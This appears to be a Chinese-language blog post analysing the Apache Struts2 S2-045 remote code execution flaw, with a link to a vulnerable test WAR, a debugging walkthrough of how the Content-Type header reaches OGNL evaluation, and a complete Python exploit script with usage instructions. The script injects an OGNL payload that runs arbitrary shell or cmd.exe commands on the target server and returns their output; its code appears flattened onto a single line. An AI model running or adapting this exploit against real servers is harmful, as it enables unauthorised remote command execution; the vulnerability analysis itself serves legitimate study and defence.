漏洞分析马后炮 s2-045漏洞分析

本文包含如下内容：

0x00 目录

---

0x01 环境搭建

现成的符合版本要求的弱环境下载：

https://raw.githubusercontent.com/mottoin/S2-045/master/S2-045.war

0x02 PoC分析

网上下载的exp-s2-045，用来测试漏洞：

#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd):    payload = "Content-Type:%{(#_='multipart/form-data')."    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."    payload += "(#_memberAccess?"    payload += "(#_memberAccess=#dm):"    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."    payload += "(#ognlUtil.getExcludedPackageNames().clear())."    payload += "(#ognlUtil.getExcludedClasses().clear())."    payload += "(#context.setMemberAccess(#dm))))."    payload += "(#cmd='%s')." % cmd    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."    payload += "(#ros.flush())}"    try:        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}        request = urllib2.Request(url, headers=headers)        page = urllib2.urlopen(request).read()    except httplib.IncompleteRead, e:        page = e.partial    print(page)    return page

这里先不解释代码，配合后面的DEBUG来解释以上PoC代码。

0x03 代码DEBUG

运行PoC，成功即运行calc，弹出一个计算器
用法为

*.py [url] [cmd]

因为我事先分析过了，先在这里打个断点。
此时计算器还没弹出，我们继续跟进到方法：

getDefaultMessage(String, Locale, ValueStack, Object[], String)

如下是defaultMessage的内容，他包含我们所有的Content-Type内容，我们跟进他在哪里被引用。

the request doesn’t contain a multipart/form-data or multipart/mixed stream, content type header is 【Content-Type内容】

message被代替成传入的参数

message = defaultMessage

buildMessageFormat(TextParseUtil.translateVariables(message, valueStack), locale);

该段为message最后被引用到的地方，跟进到两个方法内，先到如下：

translateVariables(String, ValueStack)

第一次跟进translateVariables方法，发现还是调用的方法，一路跟进，直接看实现具体的实现。

从这两张图可以看出，他继承了接口

com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator

在创建对象后立即重写了方法：

com.opensymphony.xwork2.util.TextParseUtil.ParsedValueEvaluator.evaluate(String)

最后要知道是，为什么该方法是怎么执行构造的内容的。

先看看这个方法的API

evaluate

Object evaluate(String parsedValue)
Evaluated the value parsed by Ognl value stack.

这里提到Ognl值栈，我们只需要构造Ognl语句，利用Ognl语句获得cmd或者shell。

---